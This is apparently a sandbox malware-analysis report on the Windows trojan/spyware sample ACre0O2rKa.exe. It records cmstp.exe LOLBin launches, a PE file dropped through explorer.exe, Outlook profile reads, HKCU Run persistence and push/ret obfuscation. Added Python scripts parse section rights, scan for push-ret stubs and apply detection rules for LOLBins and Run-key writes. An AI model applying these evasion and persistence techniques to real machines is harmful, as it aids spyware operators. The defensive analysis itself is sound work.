Source: ACre0O2rKa.exe, 00000000.00000002.579705323.0000000002220000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUsedly.exeFE2XFortogden7 vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000002.646807472.0000000006CA3000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000002.647439064.0000000006EAF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000000.577859120.0000000000492000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\WWAHost.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Uses Windows Living Off The Land Binaries (LOLBins)
Source: unknown Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Yara signature match
Classification label
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/6@8/3
Creates files inside the user directory
Source: C:\Windows\SysWOW64\WWAHost.exe File created: C:\Users\user\AppData\Roaming\8KA1218A
Creates mutexes
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_01
Creates temporary files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Uolmxh0
PE file has an executable .text section and no other executable section
Source: ACre0O2rKa.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the VB 6.0 runtime library (probably coded in Visual Basic)
 Reads ini files
 Reads software policies
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
 Reads the hosts file
 Sample is known by Antivirus
 Source: ACre0O2rKa.exe Virustotal: Detection: 74%
 Source: ACre0O2rKa.exe ReversingLabs: Detection: 82%
 Spawns processes
 Uses an in-process (OLE) Automation server
 Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
 Writes ini files
 Source: C:\Windows\SysWOW64\WWAHost.exe File written: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogri.ini
 Found graphical window changes (likely an installer)
 Source: Window Recorder Window detected: More than 3 window changes detected
 Checks if Microsoft Office is installed
 Source: C:\Windows\SysWOW64\WWAHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
 This key holds the Outlook 2013 mail account profiles, not just a marker that Office is present, so the read is also consistent with harvesting stored mail account settings.
 Binary contains paths to debug symbols
 WWAHost.pdb, cmstp.pdb, wscript.pdb, msdt.pdb and wntdll.pdb are the symbol files of Windows binaries, not of the sample's own build; finding them inside ACre0O2rKa.exe and 5jd0x8e0uzsd8l.exe memory means those processes hold mapped copies of the system images, which fits the cmstp.exe, msdt.exe and wscript.exe processes that appear in this report.
 Source: Binary string: WWAHost.pdb source: ACre0O2rKa.exe, 00000001.00000002.646478162.0000000006BF0000.00000040.00000001.sdmp
 Source: Binary string: cmstp.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 00000010.00000003.1106836628.0000000000673000.00000004.00000001.sdmp
 Source: Binary string: wscript.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1103000514.0000000002190000.00000040.00000001.sdmp
 Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.626009404.000000000D160000.00000002.00000001.sdmp
 Source: Binary string: msdt.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 00000014.00000002.1136585300.0000000006CB0000.00000040.00000001.sdmp
 Source: Binary string: WWAHost.pdbUGP source: ACre0O2rKa.exe, 00000001.00000002.646478162.0000000006BF0000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdbUGP source: ACre0O2rKa.exe, 00000001.00000002.647439064.0000000006EAF000.00000040.00000001.sdmp, WWAHost.exe, 00000003.00000002.1228048773.00000000033C0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1109567888.0000000006EEF000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000010.00000002.1112600401.0000000006E10000.00000040.00000001.sdmp, wscript.exe, 00000012.00000002.1105602739.000000000498F000.00000040.00000001.sdmp, cmstp.exe, 00000013.00000002.1110322751.0000000004AA0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000014.00000002.1137111824.0000000006E40000.00000040.00000001.sdmp, msdt.exe, 00000015.00000002.1136038933.000000000100F000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdb source: ACre0O2rKa.exe, WWAHost.exe, 5jd0x8e0uzsd8l.exe, 5jd0x8e0uzsd8l.exe, 00000010.00000002.1112600401.0000000006E10000.00000040.00000001.sdmp, wscript.exe, 00000012.00000002.1105602739.000000000498F000.00000040.00000001.sdmp, cmstp.exe, 00000013.00000002.1110322751.0000000004AA0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000014.00000002.1137111824.0000000006E40000.00000040.00000001.sdmp, msdt.exe, 00000015.00000002.1136038933.000000000100F000.00000040.00000001.sdmp
 Source: Binary string: wscript.pdb source: 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1103000514.0000000002190000.00000040.00000001.sdmp
 Source: Binary string: cmstp.pdb source: 5jd0x8e0uzsd8l.exe, 00000010.00000003.1106836628.0000000000673000.00000004.00000001.sdmp
 Source: Binary string: msdt.pdb source: 5jd0x8e0uzsd8l.exe, 00000014.00000002.1136585300.0000000006CB0000.00000040.00000001.sdmp
 Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.626009404.000000000D160000.00000002.00000001.sdmp

Data Obfuscation:

 Detected unpacking (changes PE section rights)
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Unpacked PE file: 1.2.ACre0O2rKa.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
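The two section-rights findings above (".text is the only executable section" and "changes PE section rights") come down to reading IMAGE_SECTION_HEADER Characteristics. The script below is an added example, not Joe Sandbox code and not from the sample: it maps the flags to E/R/W letters in the spirit of the report's notation, checks that .text is the only executable section, and diffs the on-disk table against the table of the unpacked image. The two section tables are constructed in the script, not dumped from ACre0O2rKa.exe.

```python
"""Turn IMAGE_SECTION_HEADER Characteristics into E/R/W letters, check that
.text is the only executable section, and diff the section rights of the
on-disk file against the unpacked image. Added example, not Joe Sandbox
code; the two section tables are constructed, not dumped from the sample.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# IMAGE_SECTION_HEADER: 8-byte Name, VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations,
# PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers,
# Characteristics. 40 bytes, little-endian.
SECTION_HEADER = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER)


def rights(characteristics):
    """E/R/W letters for one section's Characteristics."""
    letters = ""
    if characteristics & IMAGE_SCN_MEM_EXECUTE:
        letters += "E"
    if characteristics & IMAGE_SCN_MEM_READ:
        letters += "R"
    if characteristics & IMAGE_SCN_MEM_WRITE:
        letters += "W"
    return letters


def parse_sections(table):
    """Parse back-to-back section headers into {name: Characteristics}."""
    sections = {}
    for index in range(len(table) // SECTION_HEADER_SIZE):
        fields = struct.unpack_from(SECTION_HEADER, table, index * SECTION_HEADER_SIZE)
        name = fields[0].rstrip(b"\x00").decode("ascii", "replace")
        sections[name] = fields[9]
    return sections


def rights_string(sections):
    """Compact rights string like the report's, e.g. '.text:ER;.rsrc:R;'."""
    return "".join(f"{name}:{rights(chars)};" for name, chars in sections.items())


def only_text_is_executable(sections):
    """True when .text carries IMAGE_SCN_MEM_EXECUTE and no other section does."""
    executable = [name for name, chars in sections.items() if chars & IMAGE_SCN_MEM_EXECUTE]
    return executable == [".text"]


def diff_rights(static, unpacked):
    """Sections whose rights differ between the two tables; '-' marks a
    section missing on one side."""
    findings = []
    for name in sorted(set(static) | set(unpacked)):
        before = rights(static[name]) if name in static else "-"
        after = rights(unpacked[name]) if name in unpacked else "-"
        if before != after:
            findings.append(f"{name}: {before} -> {after}")
    return findings


def make_header(name, characteristics, virtual_address, size=0x1000):
    """Build one constructed section header (relocation fields zeroed)."""
    return struct.pack(SECTION_HEADER, name.encode().ljust(8, b"\x00"), size,
                       virtual_address, size, virtual_address, 0, 0, 0, 0, characteristics)


# Constructed on-disk table: code, data and resources.
STATIC_TABLE = (
    make_header(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, 0x1000)
    + make_header(".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x4000)
    + make_header(".rsrc", IMAGE_SCN_MEM_READ, 0x5000)
)
# Constructed unpacked table: only a code section is left, as in the report.
UNPACKED_TABLE = make_header(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, 0x1000)

if __name__ == "__main__":
    static = parse_sections(STATIC_TABLE)
    unpacked = parse_sections(UNPACKED_TABLE)
    print(rights_string(static), "vs", rights_string(unpacked))
    print("only .text executable:", only_text_is_executable(static))
    for finding in diff_rights(static, unpacked):
        print(finding)
```

On a real file you would feed parse_sections the bytes starting at the first section header (e_lfanew + 4 + 20 + SizeOfOptionalHeader) for NumberOfSections entries, and for the unpacked side the headers rebuilt from the memory dump; the diff then tells you which sections the unpacker dropped or re-protected.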
 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E40 push 004012B8h; ret 0_2_00402E53
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A44 push 004012B8h; ret 0_2_00402A57
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403444 push 004012B8h; ret 0_2_00403457
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403048 push 004012B8h; ret 0_2_0040305B
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C4C push 004012B8h; ret 0_2_00402C5F
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402850 push 004012B8h; ret 0_2_00402863
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403250 push 004012B8h; ret 0_2_00403263
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E54 push 004012B8h; ret 0_2_00402E67
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A58 push 004012B8h; ret 0_2_00402A6B
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403458 push 004012B8h; ret 0_2_0040346B
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040305C push 004012B8h; ret 0_2_0040306F
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C60 push 004012B8h; ret 0_2_00402C73
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402864 push 004012B8h; ret 0_2_00402877
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403264 push 004012B8h; ret 0_2_00403277
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E68 push 004012B8h; ret 0_2_00402E7B
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A6C push 004012B8h; ret 0_2_00402A7F
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040346C push 004012B8h; ret 0_2_0040347F
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403070 push 004012B8h; ret 0_2_00403083
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C74 push 004012B8h; ret 0_2_00402C87
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402878 push 004012B8h; ret 0_2_0040288B
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403278 push 004012B8h; ret 0_2_0040328B
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E7C push 004012B8h; ret 0_2_00402E8F
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402800 push 004012B8h; ret 0_2_00402813
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403200 push 004012B8h; ret 0_2_00403213
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E04 push 004012B8h; ret 0_2_00402E17
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A08 push 004012B8h; ret 0_2_00402A1B
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403408 push 004012B8h; ret 0_2_0040341B
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040300C push 004012B8h; ret 0_2_0040301F
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C10 push 004012B8h; ret 0_2_00402C23
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402814 push 004012B8h; ret 0_2_00402827
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403214 push 004012B8h; ret 0_2_00403227
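Every stub listed above pushes the same value, 004012B8h, and hits a ret exactly 0x13 bytes later, so each one ends as an indirect jump to 004012B8h: the pushed immediate is what ret pops as its return address. The scanner below is an added example, not Joe Sandbox code and not bytes from ACre0O2rKa.exe; it reproduces two of the report's stubs (push at 00402800 and 00402814, ret at 00402813 and 00402827) in a constructed buffer, reports them in the report's own format, and summarises the targets and stride. The .text bounds and the 32-byte search window are assumptions.

```python
"""Find `push imm32 ... ret` stubs, the idiom behind the report's
'push 004012B8h; ret' findings: the pushed immediate becomes the return
address, so the pair acts as an obfuscated `jmp 004012B8h`. Added example,
not Joe Sandbox code. The code bytes are constructed to reproduce two of
the report's stubs; the .text bounds and the search window are assumptions.
"""
import struct
from collections import Counter

PUSH_IMM32 = 0x68
RET = 0xC3
TEXT_RANGE = (0x401000, 0x404000)  # assumed .text bounds of the image


def find_push_ret(code, base_va, text_range=TEXT_RANGE, window=32):
    """Return (push_va, target, ret_va) for each `push imm32` whose immediate
    lies inside the code range and that is followed by a `ret` within
    `window` bytes. Byte-pattern heuristic, not a disassembler: a 0xC3 that
    is really an operand of another instruction will also match."""
    low, high = text_range
    hits = []
    for i in range(len(code) - 4):
        if code[i] != PUSH_IMM32:
            continue
        imm = struct.unpack_from("<I", code, i + 1)[0]
        if not (low <= imm < high):
            continue  # a plain constant being pushed, not a code address
        for j in range(i + 5, min(len(code), i + 5 + window)):
            if code[j] == RET:
                hits.append((base_va + i, imm, base_va + j))
                break
    return hits


def format_hit(hit):
    """Same shape as the report's lines: '<push va> push <imm>h; ret <ret va>'."""
    push_va, target, ret_va = hit
    return f"{push_va:08X} push {target:08X}h; ret {ret_va:08X}"


def targets(hits):
    """Count stubs per target. Dozens of stubs all returning into one address
    at a fixed stride is what a compiler-generated thunk table looks like
    (the report also notes the VB 6.0 runtime), so on its own this signature
    is weak evidence of deliberate obfuscation."""
    return Counter(target for _, target, _ in hits)


def strides(hits):
    """Distances between consecutive stubs; one value means a regular table."""
    addrs = [push_va for push_va, _, _ in hits]
    return sorted({b - a for a, b in zip(addrs, addrs[1:])})


def stub(target, gap):
    """Constructed stub: push imm32, `gap` nops, ret."""
    return bytes([PUSH_IMM32]) + struct.pack("<I", target) + b"\x90" * gap + bytes([RET])


BASE_VA = 0x402800
# Constructed .text fragment: two 0x14-byte stubs matching the report,
# a push of a small constant (ignored), and a push with no ret in range.
CODE = (
    stub(0x4012B8, 14)
    + stub(0x4012B8, 14)
    + stub(0x00000001, 2)
    + bytes([PUSH_IMM32]) + struct.pack("<I", 0x4012B8) + b"\x90" * 40
)

if __name__ == "__main__":
    hits = find_push_ret(CODE, BASE_VA)
    for hit in hits:
        print(format_hit(hit))
    print("targets:", {hex(t): n for t, n in targets(hits).items()})
    print("strides:", [hex(s) for s in strides(hits)])
```

Run against a real .text dump, pass the section's virtual address as base_va and its real bounds as text_range; a handful of distinct targets spread irregularly through the code is the hand-rolled obfuscation case, while one target at one stride is the thunk-table case and should be weighted accordingly.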

Persistence and Installation Behavior:

 Drops PE files
 Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe
 The writer is explorer.exe rather than the sample's own process, so the drop is carried out from code running inside Explorer.

Boot Survival:

 Creates an autostart registry key
 Source: C:\Windows\SysWOW64\WWAHost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TV1TEJQ8W4
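Two behaviours in this report are cheap to turn into host-side detections: the cmstp.exe launch with nothing but its own path on the command line (Living Off The Land Binaries, above) and the HKCU Run value written by WWAHost.exe, a Windows system binary with no reason of its own to persist. The triage script below is an added example, not Joe Sandbox code and not from the sample: it runs both checks over constructed JSON records shaped like Sysmon EventID 1 (process create) and EventID 13 (registry value set). The event records, the parent process, the SID and the Run value data are constructed for the example; the LOLBin list is an assumption drawn from the binaries named in this report.

```python
"""Triage two behaviours from the report over process-creation and
registry-set events: (1) a LOLBin launched with no arguments, as cmstp.exe
was here, and (2) an HKCU Run value written by a Windows system binary, as
WWAHost.exe did here. Added example, not Joe Sandbox output; the events are
constructed JSON records shaped like Sysmon EventID 1 and 13.
"""
import json
import re

# LOLBins that need an argument (an .inf, a script, a diagnostic package)
# to do anything legitimate. Assumed list, taken from the binaries whose
# names appear in this report.
LOLBINS_NEED_ARGS = {"cmstp.exe", "msdt.exe", "wscript.exe"}

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
SYSTEM_DIR_RE = re.compile(r"^C:\\Windows\\", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def argless_lolbin(event):
    """EventID 1: image is a LOLBin and the command line is just the image
    (optionally quoted) with nothing after it."""
    if event.get("EventID") != 1:
        return None
    image = event["Image"]
    if basename(image) not in LOLBINS_NEED_ARGS:
        return None
    cmdline = event.get("CommandLine", "").strip().strip('"')
    if cmdline.lower() == image.lower():
        return f"argless_lolbin: {event['ParentImage']} -> {image}"
    return None


def system_binary_run_key(event):
    """EventID 13: a Run value set by a process image under C:\\Windows.
    Built-in hosts such as WWAHost.exe have no business persisting via
    HKCU\\...\\Run; a hit here means foreign code is running in that process."""
    if event.get("EventID") != 13:
        return None
    if not RUN_KEY_RE.search(event["TargetObject"]):
        return None
    if SYSTEM_DIR_RE.match(event["Image"]):
        return (f"system_binary_run_key: {event['Image']} set "
                f"{event['TargetObject']} = {event['Details']}")
    return None


RULES = (argless_lolbin, system_binary_run_key)


def triage(lines):
    """Run every rule over each JSON event line; return the findings in order."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for rule in RULES:
            hit = rule(event)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample events (not from the report's capture). The second and
# fourth records are benign controls: cmstp.exe given an .inf, and a user
# application registering its own Run value.
SAMPLE_EVENTS = r'''
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\SysWOW64\\cmstp.exe", "CommandLine": "C:\\Windows\\SysWOW64\\cmstp.exe"}
{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\cmstp.exe", "CommandLine": "cmstp.exe /ni /s C:\\ProgramData\\vpn\\corp.inf"}
{"EventID": 13, "Image": "C:\\Windows\\SysWOW64\\WWAHost.exe", "TargetObject": "HKU\\S-1-5-21-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\TV1TEJQ8W4", "Details": "C:\\Program Files (x86)\\Uolmxh0\\5jd0x8e0uzsd8l.exe"}
{"EventID": 13, "Image": "C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", "TargetObject": "HKU\\S-1-5-21-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive", "Details": "C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"}
'''.strip().splitlines()

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The first rule will also fire when a user double-clicks one of these binaries, so treat it as a triage lead rather than a blocking alert; the second rule is far more specific, since system binaries that legitimately persist do so under HKLM via their installers, not via HKCU Run from inside the running process.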

Hooking and other Techniques for Hiding and Protection:

 Disables application error messages (SetErrorMode)